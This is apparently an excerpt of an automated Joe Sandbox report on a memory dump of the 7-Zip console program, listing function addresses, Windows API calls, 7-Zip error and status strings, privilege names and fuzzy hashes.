_CxxThrowException.MSVCRT ref: 0098186B
_CxxThrowException.MSVCRT ref: 00981171

Part of subcall function 009763D0: free.MSVCRT ref: 00976440
Part of subcall function 009763D0: free.MSVCRT ref: 00976448

_CxxThrowException.MSVCRT ref: 009818F2

Strings

Cannot find archive name, xrefs: 0098110A
Cannot use absolute pathnames for this command, xrefs: 0098138C
Unsupported command:, xrefs: 00980E57
-ai switch is not supported for this command, xrefs: 009815C3
stdout mode and email mode cannot be combined, xrefs: 00981710
I won't write data and program's messages to same stream, xrefs: 009814B3, 00981782
Incorrect Number of benmchmark iterations, xrefs: 00981847
I won't write compressed data to a terminal, xrefs: 00981741
Unsupported -spf:, xrefs: 00980F7E
The command must be specified, xrefs: 00980DF5
Archive name cannot by empty, xrefs: 00981151
Only one archive can be created with rename command, xrefs: 009817E1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrow$free$wcscmp
String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect Number of benmchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -spf:$Unsupported command:$stdout mode and email mode cannot be combined
API String ID: 1252877886-1892825451
Opcode ID: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction ID: 4494e37a52e90d70e8884aa83ff0b978af0cd728354dc14098ea5835e475f76a
Opcode Fuzzy Hash: 2d54ac1d442180f274b4e0e09de258fcbcbabc9e13662fdbd6c082bf20b8ab4a
Instruction Fuzzy Hash: 8352D2733086C5A6DB28EF29D1907EEBB69F395744F888016D79D03B22DB78D5A9C700

Function 00981D04 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00981D12
CloseHandle.KERNEL32 ref: 00981D25
OpenProcessToken.ADVAPI32 ref: 00981D48
LookupPrivilegeValueW.ADVAPI32 ref: 00981D70
AdjustTokenPrivileges.KERNELBASE ref: 00981D93
CloseHandle.KERNEL32 ref: 00981DA7
GetLastError.KERNEL32 ref: 00981DB1
CloseHandle.KERNELBASE ref: 00981DC6

Strings

SeSecurityPrivilege, xrefs: 00981D57

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeSecurityPrivilege
API String ID: 1313864721-2333288578
Opcode ID: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction ID: 65e239859849ed19326e55252678024993c50f5a3930effb3a12fcefac993789
Opcode Fuzzy Hash: 2923db911ffe3ad089c3a4e31a474f10bd7caa2875252cb64e8c2824bd01d802
Instruction Fuzzy Hash: E1116672208B44C2DA00DB16FE5436DB3AEFBC4B95F940416E98B42B95CF3CC44AC710

Function 0097AC74 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0097AC84
OpenProcessToken.ADVAPI32 ref: 0097AC95
LookupPrivilegeValueW.ADVAPI32 ref: 0097ACA9
AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,FFFFFFFF,?,0097F928), ref: 0097ACE0
GetLastError.KERNEL32(?,?,?,?,?,?,?,FFFFFFFF,?,0097F928), ref: 0097ACEA
CloseHandle.KERNELBASE ref: 0097ACFA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3398352648-0
Opcode ID: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction ID: b5c530f0ebe4268fd12dc6a3eb70df32684be1e90aed42ba008c5046f581800a
Opcode Fuzzy Hash: 46a4ba1a1edc4c5f8ee714ce144b7b130588888e6f26d8e9239554c7fff26e4b
Instruction Fuzzy Hash: 0301CC7361468187DB208FA8FD9038E33A0F780B91F548435EB8A82A64CF3CC889CB00

Function 00977978 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0097794C: FindClose.KERNELBASE ref: 0097795E

FindFirstFileW.KERNELBASE ref: 009779BA

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

FindFirstFileW.KERNELBASE ref: 009779FA
free.MSVCRT ref: 00977A08

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: Find$FileFirstfree$Closememmove
String ID:
API String ID: 2921071498-0
Opcode ID: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction ID: 11574df32454c3f00b98dff259873c1ae15908acf7c49cfe61918e106437f4fb
Opcode Fuzzy Hash: 4e67d28d15530b19911ab8aa71c5e2449fd5b6dc038138c971fc29035e38fd3d
Instruction Fuzzy Hash: 4E210A37208A8086DB25DF65E85035DA365F78A7B8F548721EABD877D9DF38CA09C700

Function 00984418 Relevance: 219.6, APIs: 132, Strings: 13, Instructions: 2096COMMON

Download Yara Rule

Strings

Internal error for symbolic link file, xrefs: 00985EFB
Can not open output file, xrefs: 009862D7
Can not delete output file, xrefs: 00985AD5
\??\, xrefs: 0098485F
Can not seek to begin of file, xrefs: 0098642F
Incorrect path, xrefs: 00985D6E
Can not set length for output file, xrefs: 009863C0
Can not rename existing file, xrefs: 0098592F
Can not create symbolic link, xrefs: 00985FAB
Can not delete output folder, xrefs: 00985A0E
Can not create hard link, xrefs: 00985E04, 009861B7
Can not create file with auto name, xrefs: 00985796, 00985867
Dangerous link path was ignored, xrefs: 00985CC1

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID:
String ID: Can not create file with auto name$Can not create hard link$Can not create symbolic link$Can not delete output file$Can not delete output folder$Can not open output file$Can not rename existing file$Can not seek to begin of file$Can not set length for output file$Dangerous link path was ignored$Incorrect path$Internal error for symbolic link file$\??\
API String ID: 0-2438533581
Opcode ID: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
Instruction ID: deb0952d80be19054a46f04ec30129318dfc1bc6a34184f6df62ed00b286bfed
Opcode Fuzzy Hash: 31e8e2464abff9e4674f824b8fe8aa86b8c880a59c4e4c35cb32490b8a983749
Instruction Fuzzy Hash: 65036233248AC182CA34EB25E4907AEB765F7C5BC0F958116EB9E87B25DF79C985C700

Function 009B950D Relevance: 116.2, APIs: 48, Strings: 18, Instructions: 748
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 009B97B9
free.MSVCRT ref: 009B97C1
free.MSVCRT ref: 009B97D3
free.MSVCRT ref: 009B97E0
free.MSVCRT ref: 009B97EE
free.MSVCRT ref: 009B9809
free.MSVCRT ref: 009B996E
free.MSVCRT ref: 009B9976
free.MSVCRT ref: 009B9988
free.MSVCRT ref: 009B9995
free.MSVCRT ref: 009B99A3
free.MSVCRT ref: 009B99C0
free.MSVCRT ref: 009B99CD
fputs.MSVCRT ref: 009B9A02
fputs.MSVCRT ref: 009B9A12
_CxxThrowException.MSVCRT ref: 009B9A3A

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

_CxxThrowException.MSVCRT ref: 009BA5E1
free.MSVCRT ref: 009BA5EF
free.MSVCRT ref: 009BA61C
free.MSVCRT ref: 009BA62E
free.MSVCRT ref: 009BA696
free.MSVCRT ref: 009BA69E
free.MSVCRT ref: 009BA6B0

Part of subcall function 00973518: free.MSVCRT ref: 00973551

Strings

Files: , xrefs: 009BA1F6
Compressed: , xrefs: 009BA2A3
Alternate Streams Size: , xrefs: 009BA250
Archives with Errors: , xrefs: 009BA07A
OK archives: , xrefs: 009BA008
Alternate Streams: , xrefs: 009BA228
ERROR: , xrefs: 009B99FB
Incorrect command line, xrefs: 009B9A0B
7zCon.sfx, xrefs: 009B9543
Size: , xrefs: 009BA278
Archives: , xrefs: 009B9FE1
Open Errors: , xrefs: 009BA138
Can't open as archive: , xrefs: 009BA03F
Folders: , xrefs: 009BA1A8
ERROR:, xrefs: 009B9F89
Warnings: , xrefs: 009BA0F0
Archives with Warnings: , xrefs: 009BA0AF
Sub items Errors: , xrefs: 009BA2FB

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrowfputs$fputc
String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
API String ID: 1639683984-435538426
Opcode ID: 8784a05a3ae184111950cd8eaa0e251a67557ac8d46b019d5a78a4e0f167a5fc
Instruction ID: e07561aaecee828f3651527cfe61708cc64e3271a9fd41bf0ea4b16d4f59f639
Opcode Fuzzy Hash: 8784a05a3ae184111950cd8eaa0e251a67557ac8d46b019d5a78a4e0f167a5fc
Instruction Fuzzy Hash: 37728772229AC095CA30EF25E9903EEB3A4F7C5B90F808526DB9E47B19DF38C555CB01

Function 009B9B5D Relevance: 84.5, APIs: 33, Strings: 15, Instructions: 507
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 009B9B6B

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009B9C12

Strings

Files: , xrefs: 009BA1F6
Compressed: , xrefs: 009BA2A3
Alternate Streams Size: , xrefs: 009BA250
Archives with Errors: , xrefs: 009BA07A
OK archives: , xrefs: 009BA008
Alternate Streams: , xrefs: 009BA228
Size: , xrefs: 009BA278
Archives: , xrefs: 009B9FE1
Open Errors: , xrefs: 009BA138
Can't open as archive: , xrefs: 009BA03F
Folders: , xrefs: 009BA1A8
ERROR:, xrefs: 009B9F89
Warnings: , xrefs: 009BA0F0
Scanning the drive for archives:, xrefs: 009B9B64
Archives with Warnings: , xrefs: 009BA0AF

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputcfputsfree
String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
API String ID: 2822829076-727241755
Opcode ID: 0ebe1bfe7f3dee7155bcc7c41e20fa3a66a5d9dc50dd3a317a4ebc43c7d4f5c7
Instruction ID: 151112cc01f41f72f14206c398eade1d5d4e8193b0d0698121742072a1f73536
Opcode Fuzzy Hash: 0ebe1bfe7f3dee7155bcc7c41e20fa3a66a5d9dc50dd3a317a4ebc43c7d4f5c7
Instruction Fuzzy Hash: DD226572319AC192CA34EB25E9913EEB3A4F7C5B90F848122DB9E47B19DF38C555CB01

Function 0099A180 Relevance: 47.6, APIs: 23, Strings: 4, Instructions: 342
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 0099A1BF
GetProcAddress.KERNEL32 ref: 0099A1D2
GetProcAddress.KERNEL32 ref: 0099A1F5
GetProcAddress.KERNEL32 ref: 0099A21E

Strings

GetHandlerProperty, xrefs: 0099A214
GetNumberOfFormats, xrefs: 0099A1EB
GetHandlerProperty2, xrefs: 0099A1B5
GetIsArc, xrefs: 0099A1C8

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AddressProc
String ID: GetHandlerProperty$GetHandlerProperty2$GetIsArc$GetNumberOfFormats
API String ID: 190572456-3984264347
Opcode ID: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
Instruction ID: dcc82fc22b8d41e5bd57b66f6f32ff08a6775d133811372280baa78a998a3d65
Opcode Fuzzy Hash: cb2dc4ab122eac0aefa29758d493a890b66f0c095af12c08d7e82ec3a4e8295b
Instruction Fuzzy Hash: D3D17532319AC096CE20EB26F85179EB3A4F7C5B80F805515EA8E47B69DF7CC545CB41

Function 009770C8 Relevance: 40.7, APIs: 27, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00977D4C: GetFileAttributesW.KERNELBASE ref: 00977D6E
Part of subcall function 00977D4C: GetFileAttributesW.KERNEL32 ref: 00977DA5
Part of subcall function 00977D4C: free.MSVCRT ref: 00977DB2

free.MSVCRT ref: 009773F6

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction ID: 97fb9fd6ddb76368789ba247edb9e0ce6da216f619b93e7d6b6776f263a6bd07
Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
Instruction Fuzzy Hash: C481972322C541D2CA20EF62E85176EE321FBC5B84F44D522FB9E8766ADF2CC945D750

Function 00977EBC Relevance: 37.2, APIs: 18, Strings: 3, Instructions: 418
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

free.MSVCRT ref: 0097812F
free.MSVCRT ref: 0097816A
free.MSVCRT ref: 0097817F
free.MSVCRT ref: 00978232

Part of subcall function 0097ABB0: GetModuleHandleW.KERNEL32 ref: 0097ABD1
Part of subcall function 0097ABB0: GetProcAddress.KERNEL32 ref: 0097ABE1
Part of subcall function 0097ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0097AC32

SetLastError.KERNEL32 ref: 0097818F
free.MSVCRT ref: 0097819B
free.MSVCRT ref: 009781A6
free.MSVCRT ref: 009781BB
free.MSVCRT ref: 00978243
free.MSVCRT ref: 0097824E
free.MSVCRT ref: 0097815F

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

Strings

:, xrefs: 00977F3A
:$DATA, xrefs: 00978030, 00978040
\, xrefs: 00977F44

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
String ID: :$:$DATA$\
API String ID: 4130059181-1004618218
Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction ID: f72f49d30429393df68d42267812d8d9b012bd61bc4b63dbe1727285c790bc35
Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
Instruction Fuzzy Hash: A302A03354968096CB20DF2AD5902AEB770F7D5790F80C226E79E87B69DF38C5A5CB04

Function 009B3E84 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 009B3ED4

Part of subcall function 009B2E24: fputs.MSVCRT ref: 009B2E47
Part of subcall function 009B2E24: fputs.MSVCRT ref: 009B2E57

fputs.MSVCRT ref: 009B3F0F

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

free.MSVCRT ref: 009B3F4C
fputs.MSVCRT ref: 009B3FAA
fputs.MSVCRT ref: 009B3FBA
fputs.MSVCRT ref: 009B4003
fputs.MSVCRT ref: 009B4013
SysFreeString.OLEAUT32 ref: 009B40A1
fputs.MSVCRT ref: 009B40C9
SysFreeString.OLEAUT32 ref: 009B418B
SysFreeString.OLEAUT32 ref: 009B41C2

Strings

Path, xrefs: 009B3EE4
--, xrefs: 009B3ECD
----, xrefs: 009B40C2
= , xrefs: 009B3FB3, 009B400C
Warning: The archive is open with offset, xrefs: 009B3F08
Type, xrefs: 009B3F76

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$FreeString$fputcfree
String ID: = $--$----$Path$Type$Warning: The archive is open with offset
API String ID: 2701146716-1919703766
Opcode ID: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
Instruction ID: f9468ae22aa5f56d0399a8780475384b822fa71343fce87e9e47f7f202e58266
Opcode Fuzzy Hash: 98949995720aafeada5ab4e649821211fbe2246f847a42084f07584e6b56428e
Instruction Fuzzy Hash: FA917936618A8582DB10EF2AEA547AE7370F7D4BE4F419122EE5E47B29DF38C945C700

Function 0097F71C Relevance: 30.0, APIs: 11, Strings: 6, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00971610: free.MSVCRT ref: 00971682
Part of subcall function 00971610: free.MSVCRT ref: 0097168A
Part of subcall function 00971610: free.MSVCRT ref: 009716C4

_CxxThrowException.MSVCRT ref: 0097F76E
_isatty.MSVCRT ref: 0097F77E
_isatty.MSVCRT ref: 0097F796
_isatty.MSVCRT ref: 0097F7AE
_CxxThrowException.MSVCRT ref: 0097F8E0
wcscmp.MSVCRT ref: 0097F96F
_CxxThrowException.MSVCRT ref: 0097F9AE
_CxxThrowException.MSVCRT ref: 0097FA6F
GetCurrentProcess.KERNEL32 ref: 0097FA77
SetProcessAffinityMask.KERNEL32 ref: 0097FA83
free.MSVCRT ref: 0097FA8F

Strings

Unsupported switch postfix -stm, xrefs: 0097FA52
Unsupported switch postfix for -slp, xrefs: 0097F991
SeRestorePrivilege, xrefs: 0097F91C
SeCreateSymbolicLinkPrivilege, xrefs: 0097F92A
Unsupported switch postfix -bb, xrefs: 0097F8C3
SeLockMemoryPrivilege, xrefs: 0097F9CB

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
API String ID: 1961088698-2328792591
Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction ID: e35030dbe384dcc2080ed6d5f496a89ef515b9361bcf0a5be3dd1951315d4895
Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
Instruction Fuzzy Hash: 37A19E73608AC5DAEB21DF29E4A03AC3B60E395B94F98C176DB8D47766DF24C985C700

Function 009BA448 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fputs.MSVCRT ref: 009BA477

Part of subcall function 009726A0: fputs.MSVCRT ref: 009726C1

fputs.MSVCRT ref: 009BA4C1
free.MSVCRT ref: 009BA52B
free.MSVCRT ref: 009BA533
free.MSVCRT ref: 009BA545
free.MSVCRT ref: 009BA57A
free.MSVCRT ref: 009BA582
free.MSVCRT ref: 009BA594
_CxxThrowException.MSVCRT ref: 009BA5E1
free.MSVCRT ref: 009BA5EF
free.MSVCRT ref: 009BA61C
free.MSVCRT ref: 009BA62E

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

Strings

Errors: , xrefs: 009BA4BA
Warnings: , xrefs: 009BA470

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputs$ExceptionThrowfputc
String ID: Errors: $Warnings:
API String ID: 437615013-2345102087
Opcode ID: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
Instruction ID: 68dc0a1a73b1467cea205d1875ab295ad3543e519646d1c4d3eaa2bc29e373d4
Opcode Fuzzy Hash: b879da1ccfc066a1247b5c29666ac93705d06d21a2897076d20723f3459c7b25
Instruction Fuzzy Hash: 935195633695C181CA30EB26FA913EDA362F7C1BA0F448512DA9E17769CF78C886C711

Function 009983C8 Relevance: 27.2, APIs: 13, Strings: 5, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00978624: free.MSVCRT ref: 009786A9

free.MSVCRT ref: 00998493
free.MSVCRT ref: 009984A7
free.MSVCRT ref: 009984B8
free.MSVCRT ref: 00998503
free.MSVCRT ref: 0099850E

Part of subcall function 009786DC: free.MSVCRT ref: 00978761

free.MSVCRT ref: 0099854D
free.MSVCRT ref: 00998558
free.MSVCRT ref: 00998590
free.MSVCRT ref: 0099859B

Part of subcall function 00998290: free.MSVCRT ref: 0099832B
Part of subcall function 00998290: free.MSVCRT ref: 00998336

free.MSVCRT ref: 009985D0
free.MSVCRT ref: 009985DB
free.MSVCRT ref: 009985EA
free.MSVCRT ref: 00998602

Part of subcall function 00973314: memmove.MSVCRT ref: 00973339

Strings

Path64, xrefs: 009984D6, 00998520
Path, xrefs: 0099856A, 009985AA
Formats, xrefs: 0099844E
Codecs, xrefs: 0099841F
7z.dll, xrefs: 009983F0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: 7z.dll$Codecs$Formats$Path$Path64
API String ID: 1534225298-3804457719
Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction ID: ad4d22b7ee5da3bc6741ecb92be75602cd37489b4f66d72dc7d538f0b993f7ed
Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
Instruction Fuzzy Hash: DD518663218A4590DE20EF1AE85179F6720EBC67E4F845152BE5E477BACF3CC68AC700

